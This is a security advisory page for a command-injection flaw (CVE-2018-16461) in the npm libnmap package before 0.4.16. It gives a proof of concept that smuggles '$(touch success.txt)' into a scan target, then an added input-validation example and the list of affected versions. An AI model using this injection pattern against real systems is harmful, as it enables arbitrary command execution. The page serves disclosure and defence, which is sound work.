Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTdnMnctNnIyNS0yajdw
Command Injection in libnmap
Versions of libnmap before 0.4.16 are vulnerable to command injection.
Proof of concept
const nmap = require('libnmap');
const opts = {
  range: [
    'scanme.nmap.org',
    // Shell command substitution: success.txt appears if this entry reaches a shell
    "x.x.$(touch success.txt)"
  ]
};
nmap.scan(opts, function(err, report) {
  if (err) throw new Error(err);
  for (let item in report) {
    console.log(JSON.stringify(report[item]));
  }
});
Recommendation
Update to version 0.4.16 or later
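Callers that pass user-supplied targets in `range` can also validate each entry before it reaches the library, as defence in depth alongside the upgrade. The following is an added example, not code from libnmap or from the advisory; the function names and the accepted target grammar (hostnames, IPv4 addresses, IPv4 CIDR blocks) are assumptions.

```javascript
// Added example (not libnmap code): allowlist check for scan targets.
// Accepts hostnames, IPv4 addresses and IPv4 CIDR blocks; IPv6 is out of scope.

// One DNS label: letters, digits, inner hyphens. A leading hyphen is refused,
// so a target can never be read as a command-line option either.
const HOST_LABEL = /^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$/;

function isHostOrIPv4(s) {
  if (s.length === 0 || s.length > 253) return false;
  return s.split('.').every((label) => HOST_LABEL.test(label));
}

function isIPv4(s) {
  const octets = s.split('.');
  return octets.length === 4 &&
    octets.every((o) => /^\d{1,3}$/.test(o) && Number(o) <= 255);
}

function isIPv4Cidr(s) {
  const parts = s.split('/');
  return parts.length === 2 && isIPv4(parts[0]) &&
    /^\d{1,2}$/.test(parts[1]) && Number(parts[1]) <= 32;
}

function isValidTarget(value) {
  return typeof value === 'string' && (isHostOrIPv4(value) || isIPv4Cidr(value));
}

// Returns a copy of the range, or throws listing every rejected entry.
function validateRange(range) {
  if (!Array.isArray(range) || range.length === 0) {
    throw new TypeError('range must be a non-empty array');
  }
  const rejected = range.filter((t) => !isValidTarget(t));
  if (rejected.length > 0) {
    throw new Error('rejected scan targets: ' + JSON.stringify(rejected));
  }
  return range.slice();
}

// Constructed input: the two entries from the proof of concept above.
const pocRange = ['scanme.nmap.org', 'x.x.$(touch success.txt)'];
try {
  validateRange(pocRange);
} catch (e) {
  console.log(e.message);
}
```

Call `validateRange(opts.range)` before `nmap.scan(opts, ...)` and treat a thrown error as a rejected request rather than retrying with a cleaned-up string.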
Permalink: https://github.com/advisories/GHSA-7g2w-6r25-2j7p
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTdnMnctNnIyNS0yajdw
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 6 years ago
Updated: about 1 year ago
Identifiers: GHSA-7g2w-6r25-2j7p, CVE-2018-16461
References:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16461
- https://hackerone.com/reports/390865
- https://github.com/advisories/GHSA-7g2w-6r25-2j7p
- https://github.com/nodejs/security-wg/blob/master/vuln/npm/474.json
- https://www.npmjs.com/advisories/719
Affected Packages
npm:libnmap
Dependent packages: 10
Dependent repositories: 37
Downloads: 736 last month
Affected Version Ranges: < 0.4.16
Fixed in: 0.4.16
All affected versions: 0.2.12, 0.2.15, 0.2.16, 0.2.17, 0.2.18, 0.2.19, 0.2.20, 0.2.21, 0.2.22, 0.2.23, 0.2.24, 0.2.25, 0.2.26, 0.2.27, 0.2.28, 0.2.29, 0.2.30, 0.2.31, 0.2.32, 0.2.33, 0.3.0, 0.3.1, 0.3.2, 0.3.3, 0.3.4, 0.3.5, 0.3.6, 0.3.7, 0.3.8, 0.3.9, 0.4.0, 0.4.1, 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.4.6, 0.4.7, 0.4.8, 0.4.9, 0.4.10, 0.4.11, 0.4.13, 0.4.14, 0.4.15
All unaffected versions: 0.4.16, 0.4.19